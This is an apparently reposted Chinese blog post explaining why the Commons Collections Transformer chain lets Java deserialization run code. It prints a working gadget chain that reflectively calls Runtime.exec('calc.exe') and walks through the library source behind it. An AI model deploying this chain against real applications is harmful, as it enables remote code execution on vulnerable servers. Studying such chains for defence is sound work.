java反序列化 - Transformer類可以執行惡意代碼的原理
阿新 • • 發佈:2018-08-16
write bject calc == return cal leg invoke stack java反序列化 - Transformer類可以執行惡意代碼的原理
0x00 代碼
Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class},new Object[]{"getRuntime", new Class[0]}), new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class},new Object[]{null, new Object[0]}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe",}), }; Transformer transformerChain = new ChainedTransformer(transformers); ByteArrayOutputStream out = new ByteArrayOutputStream(); ObjectOutputStream objOut; try { objOut = new ObjectOutputStream(out); objOut.writeObject(transformerChain); transformerChain.transform(null); } catch (IOException e) { // TODO Auto-generated catch block e.printStackTrace(); }
執行結果:
0x01 Transformer類為什麽可以執行惡意代碼?
transformerChain.transform(null); 執行的是:ChainedTransformer類的transform方法
public Object transform(Object object) { for (int i = 0; i < iTransformers.length; i++) { object = iTransformers[i].transform(object); } return object; }
object = iTransformers[i].transform(object); 執行的是InvokerTransformer類的transform方法
public Object transform(Object input) { if (input == null) { return null; } try { Class cls = input.getClass(); Method method = cls.getMethod(iMethodName, iParamTypes); return method.invoke(input, iArgs); } catch (NoSuchMethodException ex) { throw new FunctorException("InvokerTransformer: The method ‘" + iMethodName + "‘ on ‘" + input.getClass() + "‘ does not exist"); } catch (IllegalAccessException ex) { throw new FunctorException("InvokerTransformer: The method ‘" + iMethodName + "‘ on ‘" + input.getClass() + "‘ cannot be accessed"); } catch (InvocationTargetException ex) { throw new FunctorException("InvokerTransformer: The method ‘" + iMethodName + "‘ on ‘" + input.getClass() + "‘ threw an exception", ex); } }
通過反射機制調用runtime.class的getMethod方法,繼續調用invoke方法生成了一個runtime的對象,最後執行該對象的exec方法,因此造成了反序列化漏洞。
可以參考:
http://blog.51cto.com/13770310/2159962 的0x03 補充
java反序列化 - Transformer類可以執行惡意代碼的原理